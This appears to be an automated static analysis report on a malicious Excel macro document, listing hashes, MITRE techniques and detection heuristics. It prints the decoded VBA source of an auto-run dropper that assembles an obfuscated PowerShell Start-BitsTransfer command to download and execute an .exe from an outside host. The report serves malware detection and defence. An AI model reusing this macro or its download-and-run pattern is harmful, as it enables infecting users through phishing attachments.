Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 202e8a9659bd624b…

MALICIOUS

Office (OOXML)

14.6 KB Created: 2015-06-05 18:19:34 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-04
MD5: aa944c5f0341c7b1217482a17f06655c SHA-1: 9ebd3beb13580c74babb75aa3fd7aee9da66fdb5 SHA-256: 202e8a9659bd624b72278de633c7e6ec3456e44d3855df91a7488aa366613245
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The VBA macro contains a Workbook_open subroutine that executes a PowerShell command. This command uses Start-BitsTransfer to download a payload from 'https://serverupload.ddns.net/Verizon%20TXTMAIL' to 'C:\Users\Public\Documents\YJznzCRNcWhyxHYcXShSLzkDyafpyGObmSmWIqvHhkacBqhbDQ.exe' and then executes it. The macro also creates a batch file at 'C:\Users\Public\Documents\HIwsTwdxLjJWxbLePKVVppzkkAuNawKhTdfUJYWqVbwuFEdEjg.bat' which contains the PowerShell command. This indicates a typical macro-based downloader attack pattern.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER
    The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
    Matched line in script
    Private Sub Workbook_open()
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject("Shell.Application").Open (EEE)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://serverupload.ddns.net/Verizon%20TXTMAIL In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1616 bytes
SHA-256: d717cd2da78db73c902406a96339282eab1bbf9cf5dbab2ad54f08bdd0205763
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Workbook______________"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Worksheet______1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Private Sub Workbook_open()
e = FreeFile
EE = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & "^"
EEE = "C:\Users\Public\Documents\HIwsTwdxLjJWxbLePKVVppzkkAuNawKhTdfUJYWqVbwuFEdEjg.bat"
EMtvXrxdTmYocxzAUvpVGgZDPUkwGuxcFUpOEcyQcGacynOVQd = ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108)
JcJunvxIjxMSvEEMTIegzGgAbSxNQgYLZcISZgkUmPfIYGNkGs = EE & EMtvXrxdTmYocxzAUvpVGgZDPUkwGuxcFUpOEcyQcGacynOVQd
Open EEE For Output As e
Print #e, JcJunvxIjxMSvEEMTIegzGgAbSxNQgYLZcISZgkUmPfIYGNkGs & " -w h Start-BitsTransfer -Source https://serverupload.ddns.net/Verizon%20TXTMAIL." & ChrW(103 - 2) & ChrW(122 - 2) & ChrW(101) & " -Destination C:\Users\Public\Documents\YJznzCRNcWhyxHYcXShSLzkDyafpyGObmSmWIqvHhkacBqhbDQ" & Replace(".gk4dxe", "gk4d", "e") & ";C:\Users\Public\Documents\YJznzCRNcWhyxHYcXShSLzkDyafpyGObmSmWIqvHhkacBqhbDQ" & Replace(".gk4dxe", "gk4d", "e") & ""
Close #e
CreateObject("Shell.Application").Open (EEE)
End Sub
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 18944 bytes
SHA-256: 3bd13a8ad97236a69717e894dd99fd1883f1e05024806ca062c2fef36eb8e20b

Open this report in the interactive analyzer, or submit your own file for analysis.